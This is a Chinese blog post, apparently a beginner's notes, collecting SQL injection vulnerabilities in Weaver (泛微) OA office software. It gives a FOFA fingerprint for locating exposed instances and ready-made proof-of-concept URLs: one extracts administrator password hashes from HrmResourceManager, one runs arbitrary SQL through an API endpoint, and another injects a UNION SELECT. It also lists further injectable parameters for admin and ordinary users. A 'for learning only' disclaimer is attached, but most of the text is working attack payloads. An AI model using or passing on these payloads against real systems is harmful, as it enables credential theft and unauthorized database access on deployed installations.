泛微OA | 您所在的位置:网站首页 › mimicall注册 › 泛微OA |
2021年进入网络安全行业,作为网络安全的小白,分享一些自学基础教程给大家。希望在自己能体系化的总结自己已有的知识的同时,能对各位博友有所帮助。文章内容比较基础,都是参考了很多大神的文章,各位不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力! 工作中遇到的漏洞,记录一下,本文仅作学习之用,请勿进行网络犯罪,遵守《网络安全法》等相关法律法规。 漏洞描述泛微OA不同版本都存在SQL注入漏洞 FOFAapp=“泛微-协同办公OA” 漏洞复现 1、泛微OA V8 SQL注入漏洞POC http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager返回了数据库第一条记录的值 通过解密后,可以登录后台(漏洞原理可参考附录文章) 2、泛微OA某版本的SQL注入漏洞(核实中)POC http://xxx.xxx.xxx.xxx/Api/portal/elementEcodeAddon/getSqlData?sql=select%20user 3、后台SQL注入使用测试账户登录,然后访问 http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=123&SORT_ID=166&func_id=&operationType=editFromRead&docStr=其中的CONTENT_ID参数能够注射SQL语句。 http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=-4%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19%23&SORT_ID=166&func_id=&operationType=editFromRead&docStr=管理员情况下的注入: http://www.e-cology.cn/systeminfo/sysadmin/sysadminEdit.jsp?id=1普通用户注入: http://xx.cn//cowork/CoworkLogView.jsp?id=151普通用户注入地址: http://xx.cn/system/basedata/basedata_role.jsp?roleid=32普通用户注入地址: http://xx.cn//system/basedata/basedata_hrm.jsp?resourceid=3 继续收集中,未完待续… 参考文章泛微OA V8 SQL注入漏洞 |
CopyRight 2018-2019 实验室设备网 版权所有 |